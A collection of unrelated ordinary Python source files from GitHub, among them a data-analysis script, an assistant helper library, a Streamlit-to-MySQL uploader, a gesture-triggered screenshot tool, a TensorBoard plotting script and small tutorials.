for i in range(0, factorNum):
for j in range(0, repNum):
tempData[i,j] = lsalib.fillMissing( tempData[i,j], fillMethod )
first_Data.append(tempData)
while j_m * block < total_row_1:
j_m += 1
skip_header = start_1
skip_footer = total_row_1 - end_1
secondData = np.genfromtxt(second_file, comments='#', delimiter='\t',missing_values=['na', '', 'NA'], filling_values=np.nan,usecols=range(1,spotNum*repNum+1), skip_header=skip_header, skip_footer=skip_footer)
if len(secondData.shape) == 1:
data = np.array([secondData])
secondFactorLabels=np.genfromtxt( second_file, comments='#', delimiter='\t', usecols=range(0,1), dtype='str', skip_header=skip_header, skip_footer=skip_footer).tolist()
if type(secondFactorLabels)==str:
secondFactorLabels=[secondFactorLabels]
factorNum = secondData.shape[0]
tempData=np.zeros((factorNum,repNum,spotNum),dtype='float')
for i in range(0, factorNum):
for j in range(0, repNum):
try:
tempData[i,j] = secondData[i][np.arange(j,spotNum*repNum,repNum)]
except IndexError:
print("Error: one input file need more than two data row or use -e to specify another input file", file=sys.stderr)
quit()
for i in range(0, factorNum):
for j in range(0, repNum):
tempData[i,j] = lsalib.fillMissing( tempData[i,j], fillMethod )
second_Data.append(tempData)
merged_filename = 'merged_data_1.h5'
def myfun_pall(i):
data = compcore.LSA(total_row_0, total_row_1)
for j in range(0, len(second_Data)):
array = lsalib.palla_applyAnalysis( first_Data[i], second_Data[j], data, col, onDiag=True, delayLimit=delayLimit,bootNum=bootNum, pvalueMethod=pvalueMethod,
precisionP=precision, fTransform=fTransform, zNormalize=zNormalize, approxVar=approxVar, resultFile=resultFile, trendThresh=trendThresh,
firstFactorLabels=firstFactorLabels, secondFactorLabels=secondFactorLabels, qvalueMethod=qvalueMethod, progressive=progressive)
with h5py.File(merged_filename, 'w') as merged_hf:
merged_hf.create_dataset(f'data_{i}_{j}', data=array)
return 1
pool = multiprocessing.Pool(processes=10)
results = [pool.apply_async(myfun_pall, args=(process_id,)) for process_id in range(len(second_Data))]
for result in results:
a = result.get()
# parallel_obj = Parallel(n_jobs= -1)
# parallel_obj(delayed(myfun_pall)(i) for i in range(0, len(first_Data)))
print("finishing up...", file=sys.stderr)
end_time=time.time()
print("time elapsed %f seconds" % (end_time - start_time), file=sys.stderr)
if __name__=="__main__":
main()
| foolstars/a_elsa | elsa/lsa/ppi.py | ppi.py | py | 14,310 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "argparse.FileType",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "argparse.FileType",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "argparse.... |
34357687621 | import argparse, subprocess, socket, json, io, os, notify2
verbose = False
def get_metadata_id_from(meta): # meta is a user/application definable metapackage
data = call_application(meta) # application meta will create a timestamp entry of the relavent metadata, and then pass back the id number to log in the database
id = data.decode('utf-8')
return id
def user_notify(message): # message string, not message like the protocol
notify2.init('Assistant')
n = notify2.Notification("Notification",
message,
"notification-message-im" # Icon name
)
n.show()
def call_database(flags): # is this too specific to sql? it could be an important distinction for de/serial purpose
# the naming scheme needs to be formalized
COMMAND = os.getenv("ASST_COMMAND")
database = os.getenv("ASST_DATABASE") # the location of the database module
# this is just a stop gap for now. Everything needs to be cleaned up
if COMMAND == None:
COMMAND = "python3"
if database == None:
database = "sqldatabase.py"
command = [COMMAND,database]
for item in flags:
command.append(item)
notify(command)
process = subprocess.run(command,stdout=subprocess.PIPE,stderr=subprocess.PIPE) # the returned value
if process.returncode is not 0: # this should return the serialized data
notify("The following command returned a non-zero code: %s"%(command))
notify("RETURN CODE: %d"%(process.returncode))
notify("STDERR: %s"%(process.stderr))
data = process.stdout
return data # it is returned, since selflib is a part of the calling program, not called over command line.
def call_application(flags): # this can be put into call_database, but I don't need it to call env variables again. is this bad?
COMMAND = os.getenv("ASST_COMMAND")
database = os.getenv("ASST_DATABASE")
notify("COMMAND: %s"%(COMMAND))
notify("DATABASE: %s"%(database))
notify("call_application called. calling %s"%(flags))
command = [COMMAND]
for item in flags:
command.append(item)
process = subprocess.run(command,stdout=subprocess.PIPE)
data = process.stdout # Don't decode. This could allow for binary responses with graphics, etc
return data # this data is returned, since this is a library called within an application. should have a unxi sample program built in
def message_server(data): # isn't this exactly what I am looking to do w/ call_application?
# Send the information to the server
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(data + "\n", "utf-8"), ("localhost", 9999))
def notify(string):
if verbose == True:
print(string)
def loud_notify(tag, string):
if verbose == True:
print("---START "+tag+"---")
print(string)
print("---END "+tag+"---")
def serialize(message):
data = json.dumps(message)
return data
def deserialize(data):
message = json.loads(data)
return message
def read_config_file():
print("This feature is not yet setup")
# run a core associated component. deserialize so it can be networked.
def run_with_return(command): # commands structure is a list. ["python3","program.py","-s","someinput"] broken up into atoms, rather than a long string. It could just be "python3 program.py -s someinput"] though...
loud_notify("Running Component", command)
pipe = pipes.Template()
f = pipe.open('pipefile','w')
subprocess.run(command, stdout=f)
f.close()
f = pipe.open('pipefile','r')
string = f.read()
return(deserialize(string))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="main udp server and router")
parser.add_argument('-v', dest='verbose', help="print verbose output", action='store_true')
parser.add_argument('-d', dest='deserialize', help="deserialize string input")
parser.add_argument('-s', dest='serialize', help="deserialize string input")
args = parser.parse_args()
if args.verbose is True:
verbose = True
if args.deserialize is not None:
deserialize(args.deserialize)
if args.serialize is not None:
serialize(args.serialize)
| Tadashi-Hikari/Sapphire-Assistant-Framework-Python | assistant/selflib.py | selflib.py | py | 4,305 | python | en | code | 1 | github-code | 6 | [
{
"api_name": "notify2.init",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "notify2.Notification",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.getenv",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "os.getenv",
"line_num... |
19432133852 | import sqlite3
import os
lat = list()
with open('latitude.dat', 'r') as lats:
lat = lats.read().split('\n')
with open('longitude.dat', 'r') as lons:
lon = lons.read().split('\n')
with open('dates.dat', 'r') as dates:
tmp = [i[1:-1] for i in dates.read().split('\n')]
base = os.path.abspath(os.path.join('.', os.pardir))
conn = sqlite3.connect(base+'/firstsite/finder/static/finder/log.sqlite3')
cc = conn.cursor()
cc.execute('''CREATE TABLE IF NOT EXISTS log
(ID INTEGER PRIMARY KEY, IP TEXT, puerto TEXT, latitud TEXT, longitud TEXT, tiempo TEXT)''')
conn.commit()
for i in range(0, len(lat)):
sent_data = ('9000', '192.168.1.1', lat[i], lon[i], tmp[i])
cc.execute('''INSERT INTO log VALUES(NULL,?,?,?,?,?)''', sent_data)
conn.commit()
| juliansibaja84/GPStracking | lib/data_parser.py | data_parser.py | py | 784 | python | en | code | 1 | github-code | 6 | [
{
"api_name": "os.path.abspath",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "os.pardir",
"line_numbe... |
22290767213 | # -*- coding: utf-8 -*-
import streamlit as st
from st_aggrid import AgGrid
import pandas as pd
import pymysql
from sqlalchemy import create_engine
engine = create_engine('mysql+pymysql://root:chiangcw@localhost/python?charset=utf8')
uploaded_file = st.file_uploader("请选择要上传的csv格式表格!")
if uploaded_file is not None:
df1 = pd.read_csv(uploaded_file)
AgGrid(df1)
df1.to_sql(name=str(uploaded_file.name).replace(".csv",""), con=engine, chunksize=1000, if_exists='replace', index=None)
st.success("上传成功!")
db = pymysql.connect(host="localhost", user="root", password="abcde", database="python", charset="utf8")
sql="select * from "+str(uploaded_file.name).replace(".csv","")
cursor = db.cursor()
cursor.execute(sql)
db.commit()
df2=pd.read_sql(sql,con=db)
st.success("数据库中的表格内容如下")
st.dataframe(df2)
else:
st.warning("请上传表格!") | chiangcw0410/mysql_test | test/test.py | test.py | py | 904 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "sqlalchemy.create_engine",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "streamlit.file_uploader",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "st_agg... |
74923077307 | import numpy as np
import pyautogui
import time
import imutils
import cv2
import mediapipe as mp
from pynput.keyboard import Key, Controller
keyboard = Controller()
mp_hands = mp.solutions.hands
hands = mp_hands.Hands()
mp_draw = mp.solutions.drawing_utils
cap = cv2.VideoCapture(0)
finger_tips = [8, 12, 16, 20]
thumb_tip = 4
thumb_status = False
def draw_circle(tip, lm_list, state=False):
x, y = int(lm_list[tip].x * w), int(lm_list[tip].y * h)
if state == True:
cv2.circle(img, (x, y), 15, (255, 0, 0), cv2.FILLED)
elif state == False:
cv2.circle(img, (x, y), 15, (0, 255, 0), cv2.FILLED)
def finger_count(lm_list):
global finger_tips
finger_fold_status = []
for tip in finger_tips:
# getting the landmark tip position and drawing blue circle
# writing condition to check if finger is folded i.e checking if finger tip starting value is smaller than finger starting position which is inner landmark. for index finger
# if finger folded changing color to green
state = lm_list[tip - 3].y < lm_list[tip].y
draw_circle(tip, lm_list, state=state)
if state:
finger_fold_status.append(True)
else:
finger_fold_status.append(False)
return finger_fold_status
def screenshot():
image = pyautogui.screenshot("screenshot.png")
time.sleep(0.5)
def readimg(name):
img = cv2.imread(name)
cv2.imshow("screenshot", imutils.resize(img, width=600))
def trigger_sign(finger_status):
# check if the correct sign is done
# put ring finger down to take screenshot
if finger_status == [False, False, True, False]:
print("ss ") # take screenshot
screenshot()
readimg("screenshot.png")
while True:
ret, img = cap.read()
img = cv2.flip(img, 1)
h, w, c = img.shape
results = hands.process(img)
if results.multi_hand_landmarks:
for hand_landmark in results.multi_hand_landmarks:
# accessing the landmarks by their position
lm_list = []
for id, lm in enumerate(hand_landmark.landmark):
lm_list.append(lm)
# array to hold true or false if finger is folded
# checking if all fingers are folded
finger_fold_status = finger_count(lm_list)
trigger_sign(finger_fold_status)
print(finger_fold_status)
mp_draw.draw_landmarks(
img,
hand_landmark,
mp_hands.HAND_CONNECTIONS,
mp_draw.DrawingSpec((0, 0, 255), 2, 2),
mp_draw.DrawingSpec((0, 255, 0), 4, 2),
)
cv2.imshow("hand tracking", img)
key = cv2.waitKey(1)
if key == 32:
break
cv2.destroyAllWindows()
| diganta121/PRO-C109 | take_screenshot.py | take_screenshot.py | py | 2,789 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "pynput.keyboard.Controller",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "mediapipe.solutions",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "mediapipe.solutions",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_... |
5125390370 | """
Demonstration of the GazeTracking library.
Check the README.md for complete documentation.
"""
import time
import threading
import cv2
import numpy as np
from gaze_tracking import GazeTracking
import sys
from PyQt5 import QtCore
from PyQt5.QtCore import QCoreApplication
from PyQt5.QtGui import QImage, QPixmap, QCloseEvent
from PyQt5.QtWidgets import QApplication, QStackedWidget
from GUImain.GUIframe import MyApp
import keyboard
import keyboard_event as event
import database_func as db
end_sig = False
img_num = 0
esc = False
webcam = cv2.VideoCapture(0)
R_top = 0
L_top = 0
C_top = 0
R_bottom = 0
L_bottom = 0
C_bottom = 0
avg_top_right = 0
avg_top_left = 0
avg_bottom_right = 0
avg_bottom_left = 0
avg_top_center = 0
avg_bottom_center = 0
total_left_hor_gaze = 0
total_right_hor_gaze = 0
total_top_ver_gaze = 0
total_bottom_ver_gaze = 0
sectionA =0
sectionB =0
sectionC =0
sectionD =0
sectionE =0
sectionF =0
section = "None"
count = 1
test_count = 1
flag = 0
gaze = GazeTracking()
#GUI
app = QApplication(sys.argv)
gui = MyApp()
gui.Stack.setCurrentWidget(gui.stack1)
gui.currentStack = 1
gui.name_btn.clicked.connect(gui.change_display)
def Section(where):
global sectionA, sectionB, sectionC, sectionD, sectionE, sectionF
if where == "A":
sectionA += 1
return sectionA
elif where == "B":
sectionB += 1
return sectionB
elif where == "C":
sectionC += 1
return sectionC
elif where == "D":
sectionD += 1
return sectionD
elif where == "E":
sectionE += 1
return sectionE
elif where == "F":
sectionF += 1
return sectionF
def Thread_run():
print(section, ":", Section(section))
thread = threading.Timer(1, Thread_run)
thread.daemon = True
thread.start()
return thread
thread = Thread_run()
while True:
#GUI
if gui.quit_sig:
sys.exit()
if bool(gui.start_btn.isChecked()):
# We get a new frame from the webcam
_, frame = webcam.read()
new_frame = np.zeros((500, 500, 3), np.uint8)
gaze.refresh(frame)
frame, loc1, loc2 = gaze.annotated_frame()
text = ""
'''
#draw face guide line
red_color = (0, 0, 255)
guide_x1 = 150
guide_y1 = 100
guide_w = 300
guide_h = 300
face_line = cv2.rectangle(frame, (guide_x1, guide_y1), (guide_x1 + guide_w, guide_y1 + guide_h), red_color, 3)
'''
#GUI
#if bool(gui.start_btn.isChecked()):
if test_count < 50:
cv2.circle(frame, (25, 25), 25, (0, 0, 255), -1)
if gaze.horizontal_ratio() != None and gaze.vertical_ratio() != None:
total_left_hor_gaze += gaze.horizontal_ratio()
total_top_ver_gaze += gaze.vertical_ratio()
test_count += 1
print("hor ratio1:", gaze.horizontal_ratio())
print("ver ratio1:", gaze.vertical_ratio())
elif 50 <= test_count < 100:
cv2.circle(frame, (610, 25), 25, (0, 0, 255), -1)
if gaze.horizontal_ratio() != None and gaze.vertical_ratio() != None:
total_right_hor_gaze += gaze.horizontal_ratio()
total_top_ver_gaze += gaze.vertical_ratio()
test_count += 1
print("hor ratio2:", gaze.horizontal_ratio())
print("ver ratio2:", gaze.vertical_ratio())
elif 100 <= test_count < 150:
cv2.circle(frame, (25, 450), 25, (0, 0, 255), -1)
if gaze.horizontal_ratio() != None and gaze.vertical_ratio() != None:
total_left_hor_gaze += gaze.horizontal_ratio()
total_bottom_ver_gaze += gaze.vertical_ratio()
test_count += 1
print("hor ratio3:", gaze.horizontal_ratio())
print("ver ratio3:", gaze.vertical_ratio())
elif 150 <= test_count < 200:
cv2.circle(frame, (610, 450), 25, (0, 0, 255), -1)
if gaze.horizontal_ratio() != None and gaze.vertical_ratio() != None:
total_right_hor_gaze += gaze.horizontal_ratio()
total_bottom_ver_gaze += gaze.vertical_ratio()
test_count += 1
print("hor ratio4:", gaze.horizontal_ratio())
print("ver ratio4:", gaze.vertical_ratio())
gaze_time = int(time.time())
save_loc1 = loc1
save_loc2 = loc2
else:
if flag == 0:
avg_left_hor_gaze = total_left_hor_gaze / 100
avg_right_hor_gaze = total_right_hor_gaze / 100
avg_top_ver_gaze = total_top_ver_gaze / 100
avg_bottom_ver_gaze = total_bottom_ver_gaze / 100
print(avg_left_hor_gaze, avg_right_hor_gaze, avg_top_ver_gaze, avg_bottom_ver_gaze)
flag = 1
if gaze.is_blinking():
text = "Blinking"
if gaze.is_top_right(avg_right_hor_gaze, avg_top_ver_gaze):
new_frame[:] = (0, 200, 227)
text = "Looking top right"
section = "A"
elif gaze.is_top_left(avg_left_hor_gaze, avg_top_ver_gaze):
new_frame[:] = (0, 0, 255)
text = "Looking top left"
section = "B"
elif gaze.is_bottom_right(avg_right_hor_gaze, avg_top_ver_gaze):
new_frame[:] = (255, 0, 170)
text = "Looking bottom right"
section = "C"
elif gaze.is_bottom_left(avg_left_hor_gaze, avg_top_ver_gaze):
new_frame[:] = (0, 255, 0)
text = "Looking bottom left"
section = "D"
elif gaze.is_top_center(avg_top_ver_gaze, avg_right_hor_gaze, avg_left_hor_gaze):
new_frame[:] = (0, 104, 250)
text = "Looking top center"
section = "E"
elif gaze.is_bottom_center(avg_top_ver_gaze, avg_right_hor_gaze, avg_left_hor_gaze):
new_frame[:] = (255, 0, 0)
text = "Looking bottom center"
section = "F"
cv2.putText(frame, text, (90, 60), cv2.FONT_HERSHEY_DUPLEX, 1.6, (147, 58, 31), 2)
left_pupil = gaze.pupil_left_coords()
right_pupil = gaze.pupil_right_coords()
cv2.putText(frame, "Left pupil: " + str(left_pupil), (90, 130), cv2.FONT_HERSHEY_DUPLEX, 0.9, (147, 58, 31), 1)
cv2.putText(frame, "Right pupil: " + str(right_pupil), (90, 165), cv2.FONT_HERSHEY_DUPLEX, 0.9, (147, 58, 31), 1)
cv2.rectangle(frame, save_loc1, save_loc2, (0, 0, 255), 2)
if test_count < 200:
cv2.namedWindow("Frame", cv2.WND_PROP_FULLSCREEN)
cv2.setWindowProperty("Frame", cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)
#cv2.imshow("New Frame", new_frame)
cv2.imshow("Frame", frame)
else:
cv2.destroyAllWindows()
#database
if keyboard.is_pressed('down') or keyboard.is_pressed('up'):
gaze_time = int(time.time()) - gaze_time
img_num = img_num + 1
gaze_info = [gui.name, img_num, sectionA, sectionB, sectionC, sectionD, sectionE, sectionF, gaze_time]
end_sig = event.tracking_con(gaze_info)
sectionA = 0
sectionB = 0
sectionC = 0
sectionD = 0
sectionE = 0
sectionF = 0
gaze_time = time.time()
elif keyboard.is_pressed('esc'):
print('esc press')
gaze_time = int(time.time()) - gaze_time
img_num = img_num + 1
gaze_info = [gui.name, img_num, sectionA, sectionB, sectionC, sectionD, sectionE, sectionF, gaze_time]
esc = event.tracking_end(gaze_info)
# GUI
gui.start = True
qformat = QImage.Format_Indexed8
if len(frame.shape) == 3:
if frame.shape[2] == 4: # RGBA
qformat = QImage.Format_RGBA8888
else: # RGB
qformat = QImage.Format_RGB888
out_image = QImage(frame, frame.shape[1], frame.shape[0], frame.strides[0], qformat)
out_image = out_image.rgbSwapped()
gui.face_label.setAlignment(QtCore.Qt.AlignCenter)
gui.face_label.setPixmap(QPixmap.fromImage(out_image))
elif gui.start:
if not end_sig:
if not esc:
gaze_time = int(time.time()) - gaze_time
img_num = img_num + 1
gaze_info = [gui.name, img_num, sectionA, sectionB, sectionC, sectionD, sectionE, sectionF, gaze_time]
end_sig = event.tracking_end(gaze_info)
thread.cancel()
cv2.destroyAllWindows()
gui.Stack.setCurrentWidget(gui.stack3)
gui.currentStack = 3
info = db.select_user_info(gui.name)
gaze_num = 0
for gaze in info:
gaze_num = gaze_num + 1
num = 1
loop = 1000
end_sig = True
if loop == 1000:
img_path = "data/"+gui.name+"_"+str(num)+".png"
print(img_path)
graph = QPixmap(img_path)
graph = graph.scaledToWidth(800)
gui.graph_label.setPixmap(graph)
num = num + 1
if num > gaze_num:
num = 1
loop = 0
loop = loop + 1
if cv2.waitKey(1) == 27:
break
total_gaze = R_top + L_top + C_top + R_bottom + L_bottom + C_bottom
# print("Top Gaze ratio : ", round(R_top/total_gaze, 2), round(L_top/total_gaze,2), round(C_top/total_gaze,2))
# print("Bottom Gaze ratio: ", round(R_bottom/total_gaze,2), round(L_bottom/total_gaze,2), round(C_bottom/total_gaze,2))
cv2.destroyAllWindows() | jinho17/eye_tracking_project | eye_tracking/Eyetracking/Eyetracking0501.py | Eyetracking0501.py | py | 10,223 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "cv2.VideoCapture",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "gaze_tracking.GazeTracking",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "PyQt5.QtWidgets.QApplication",
"line_number": 63,
"usage_type": "call"
},
{
"api_name... |
# Open Chrome in headless mode, load the Google homepage, then quit.
from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager
# ChromeDriver configuration
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument('--headless') # run headless (no browser window)
# Start the ChromeDriver
# NOTE(review): passing the driver path as the first positional argument was
# deprecated in Selenium 4 (use Service(...)) — confirm the installed version.
driver = webdriver.Chrome(ChromeDriverManager().install(), options=chrome_options)
# Open the Google homepage
driver.get('https://www.google.com.br')
# Close the browser
driver.quit()
| hericmr/OlhoVivo | sms.py | sms.py | py | 481 | python | pt | code | 0 | github-code | 6 | [
{
"api_name": "selenium.webdriver.ChromeOptions",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "selenium.webdriver.Chrome",
"line_number": 9,
"usage_type": "call"
},
{
"api_na... |
19109140061 | from django.shortcuts import render, redirect
from time import strftime
def index(request):
    """Render the index template with the current local date and time."""
    context = {
        # strftime falls back to localtime() when no time tuple is passed
        "date": strftime("%B %d, %Y"),
        "time": strftime("%I:%M %p"),
    }
    return render(request, 'myapp/index.html', context)
{
"api_name": "time.strftime",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "time.strftime",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "django.shortcuts.render",
"line_number": 10,
"usage_type": "call"
}
] |
71049150269 | from functools import reduce
import time
def add(x, y):
    """Return the sum of *x* and *y*."""
    total = x + y
    return total
# Anonymous function (lambda) equivalent to add()
f = lambda x, y: x + y
# Ternary (conditional) expression
x, y = 2, 3
r = x if x > y else y
# map
list_x = [1, 2, 3, 4]
m = map(lambda x: x*x, list_x)
print(list(m))  # [1, 4, 9, 16]
# map with multiple iterables
list_y = [2, 3, 4, 5]
m2 = map(lambda x, y: x*x + y, list_x, list_y)
print(list(m2))  # [3, 7, 13, 21]
# reduce: cumulative (left-fold) computation
r = reduce(lambda x, y: x+y, list_x)
print(r)  # 10
r1 = reduce(lambda x, y: x+y, list_x, 10)
# BUG FIX: this previously printed `r` (10) although the comment expected 20.
print(r1)  # 20 (10 is the initial value)
# filter
list_x = [0, 1, 0, 2, 0, 1]
f = filter(lambda x: True if x == 1 else False, list_x)  # keep the 1s
print(list(f))  # [1, 1]
# Decorator (annotation-style)
def print_current_time(func):
    """Wrap *func* so start/end markers are printed around each call.

    BUG FIX: the original wrapper discarded *func*'s return value; it is
    now passed through to the caller.
    """
    def wrapper(*args, **kw):  # variadic: accepts any call signature
        print('func start')
        result = func(*args, **kw)
        print('func end')
        return result
    return wrapper
@print_current_time
def pf(name):
    """Print a demo message; the decorator prints markers around the call."""
    print('this is a func ', name)
pf('pf')
| xxg3053/learn-python | lang/high.py | high.py | py | 942 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "functools.reduce",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "functools.reduce",
"line_number": 30,
"usage_type": "call"
}
] |
43347091848 | import tikzplotlib
from tensorboard.data.experimental import ExperimentFromDev
import re
from collections import defaultdict
import matplotlib.pyplot as plt
import numpy as np
import pickle
def group_by_repetition(scalars):
    """Interactively group tensorboard runs by job name / repetition id.

    Runs are matched against two regexes (with/without a "repetition.N"
    part), grouped, and the user is prompted for a short display name per
    group. Chosen names are persisted to ../tmp/default_short_names.pkl and
    offered as defaults on the next invocation. Entering "del" drops a group.
    Returns a dict short-name -> list of run names.
    """
    runs = scalars.run.unique()
    # each run has name job*_A --> no repetition
    # or job*_Arepetition.*C --> repetition id indicated by second star
    # job[0-9]+_([a-zA-Z0-9\._\/]*)repetition\.([0-9]+)([a-zA-Z0-9\._\/]*)
    # job[0-9]+_([a-zA-Z0-9\._\/]*)
    groups = defaultdict(list)
    for run in runs:
        match_repetition = re.match("[0-9\-\/]*job[0-9]+_([a-zA-Z0-9\._\/\-]*)repetition\.([0-9]+)([a-zA-Z0-9\._\/]*)", run)
        match_no_repetition = re.match("[0-9\-\/]*job[0-9]+_([a-zA-Z0-9\._\/]*)", run)
        if match_repetition:
            # Group key is (prefix, suffix) around the repetition number.
            A = match_repetition.group(1)
            C = match_repetition.group(3)
            groups[(A, C)].append(run)
        elif match_no_repetition:
            A = match_no_repetition.group(1)
            groups[A].append(run)
        else:
            print("job name could not be match with a regex: {} , skipping".format(run))
    print("Found {} groups:".format(len(groups)))
    for x in groups:
        if isinstance(x, tuple):
            print("job*_{}repetition.*{}".format(x[0], x[1]))
        elif isinstance(x, str):
            print("job*_{}".format(x))
    print("\n")
    renamed_groups = defaultdict(list)
    try:
        # Previously chosen short names, reused as defaults.
        with open("../tmp/default_short_names.pkl", 'rb') as f:
            default_names = pickle.load(f)
    except FileNotFoundError as e:
        default_names = {}
    for x in groups:
        if x in default_names:
            def_name = default_names[x]
            suffix = "default = {}".format(def_name)
        else:
            suffix = ""
        # NOTE(review): if the user enters nothing and no default exists,
        # `def_name` is unbound here and this raises NameError — confirm.
        if isinstance(x, tuple):
            name = input("Please give a short name to job*_{}repetition.*{}\n{}\n".format(x[0], x[1], suffix)) or def_name
        elif isinstance(x, str):
            name = input("Please give a short name to job*_{}\n{}\n".format(x, suffix)) or def_name
        if name != "del":
            renamed_groups[name] += groups[x]
            default_names[x] = name
    with open("../tmp/default_short_names.pkl", 'wb') as f:
        pickle.dump(default_names, f)
    return renamed_groups
def get_mean_std(data):
    """Aggregate several runs into per-step mean and standard deviation.

    Args:
        data: list of DataFrame-like objects, each with a ``step`` column
            and a ``value`` column; runs may start and end at different steps.

    Returns:
        x (np.ndarray): common step axis, from the latest start to the end
            of the longest run (exclusive).
        mean (np.ndarray): mean over the runs still alive at each step.
        std (np.ndarray): standard deviation over those same runs.
    """
    all_lengths = sorted(d.step.values[-1] for d in data)
    all_starts = sorted(d.step.values[0] for d in data)
    max_start = max(all_starts)
    max_length = max(all_lengths)
    # BUG FIX: the old code computed all_lengths[-2] into an unused variable,
    # which raised IndexError whenever a group contained a single run.
    x = np.arange(max_start, max_length)
    # Resample every run onto the common axis; shorter runs are truncated.
    data = [np.interp(x[x <= d.step.values[-1]], d.step, d["value"]) for d in data]
    sum_arr = np.zeros(max_length - max_start)
    count_arr = np.zeros(max_length - max_start, dtype=np.int32)
    for d in data:
        sum_arr[:len(d)] += d
        count_arr[:len(d)] += 1
    mean = sum_arr / count_arr
    # Second pass: accumulate squared deviations with the same alive-counts.
    sum_arr = np.zeros(max_length - max_start)
    count_arr = np.zeros(max_length - max_start, dtype=np.int32)
    for d in data:
        sum_arr[:len(d)] += (d - mean[:len(d)]) ** 2
        count_arr[:len(d)] += 1
    std = np.sqrt(sum_arr / count_arr)
    return x, mean, std
def plot_by_tag(fig, scalars, groups, tag, ylim=None):
    """Plot mean±std curves of *tag* for every run group onto *fig*.

    Args:
        fig: matplotlib figure to draw into (one new axes is added).
        scalars: tensorboard scalars table (columns: run, tag, step, value).
        groups: mapping short-name -> list of run names.
        tag: full scalar tag to select.
        ylim: optional (low, high) y-axis limits.
    """
    ax = fig.add_subplot(111)
    for name, runs in groups.items(): # for each group
        data = [scalars[scalars.run.eq(run) & scalars.tag.eq(tag)] for run in runs]
        x, mean, std = get_mean_std(data)
        line, = ax.plot(x, mean, label=name)
        # Shaded band: one standard deviation around the mean, same color.
        ax.fill_between(x, mean - std, mean + std, color=line.get_color(), alpha=0.1)
    scalar_name = tag.split("/")[-1].replace('_', ' ')
    # Advertise the repetition count only when all groups have the same one.
    n_repetitions = set(len(runs) for runs in groups.values())
    if len(n_repetitions) == 1:
        suffix = " ({} repetitions)".format(n_repetitions.pop())
    else:
        suffix = ""
    fig.suptitle(scalar_name + suffix)
    ax.legend()
    ax.set_xlabel("episodes")
    ax.set_ylabel(scalar_name)
    if ylim is not None:
        ax.set_ylim(ylim)
def aggregate_runs(experiment_id, path):
    """Interactively plot grouped runs of a tensorboard.dev experiment.

    Downloads the scalars for *experiment_id*, asks the user to group/name
    the runs, then repeatedly prompts for which groups to plot and saves one
    PNG per tag under *path*.
    """
    exp = ExperimentFromDev(experiment_id)
    scalars = exp.get_scalars()
    groups = group_by_repetition(scalars)
    available_groups_string = ""
    for i, key in enumerate(groups):
        available_groups_string += "{: 2d} \t {}\n".format(i, key)
    fig = plt.figure(dpi=300)
    done = False
    while not done:
        # Comma-separated group indices typed by the user.
        which = list(map(int, input("Which groups should be plotted? available are:\n" + available_groups_string).split(',')))
        groups_to_plot = {key: value for i, (key, value) in enumerate(groups.items()) if i in which}
        # (tag, y-limits) pairs; success rates are percentages, others raw.
        for tag, ylim in [
            ("evaluation_success_rate_percent_wrt_ep", (0, 105)),
            ("evaluation_success_rate_percent_wrt_tr", (0, 105)),
            ("exploration_success_rate_percent_wrt_ep", (0, 105)),
            ("exploration_success_rate_percent_wrt_tr", (0, 105)),
            ("evaluation_delta_distance_to_goal_wrt_ep", (0, 2.0)),
            ("evaluation_delta_distance_to_goal_wrt_tr", (0, 2.0)),
            ("exploration_delta_distance_to_goal_wrt_ep", (0, 2.0)),
            ("exploration_delta_distance_to_goal_wrt_tr", (0, 2.0)),
            ("evaluation_time_to_solve_wrt_ep", (0, 25)),
            ("evaluation_time_to_solve_wrt_tr", (0, 25)),
        ]:
            plot_by_tag(fig, scalars, groups_to_plot, "collection/{}".format(tag), ylim=ylim)
            fig.savefig(path + "/{}_{}_{}.png".format(tag, "_".join(map(str, which)), experiment_id))
            # tikzplotlib.save(path + "/{}_{}_{}.tex".format(tag, "_".join(map(str, which)), experiment_id))
            # NOTE(review): Figure.clf takes keep_observers, not a figure —
            # passing `fig` here is likely meant to be plain fig.clf(); confirm.
            fig.clf(fig)
        done = input("make an other plot? (yes/no)") == "no"
    plt.close(fig)
if __name__ == '__main__':
    import sys
    # First CLI argument: the tensorboard.dev experiment id to aggregate.
    experiment_id = sys.argv[1]
    aggregate_runs(experiment_id, '/tmp')
| charleswilmot/coppelia_sim_inverse_model | src/aggregate_runs.py | aggregate_runs.py | py | 5,903 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "collections.defaultdict",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "re.match",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "re.match",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "collections.defaultdict",
... |
42408411037 | # Телеграмм-бот для конвертации валют: @valuta_course_bot
import telebot
from config import keys, TOKEN
from extensions import APIException, CurrencyConverter
bot = telebot.TeleBot(TOKEN)
@bot.message_handler(commands=['start'])
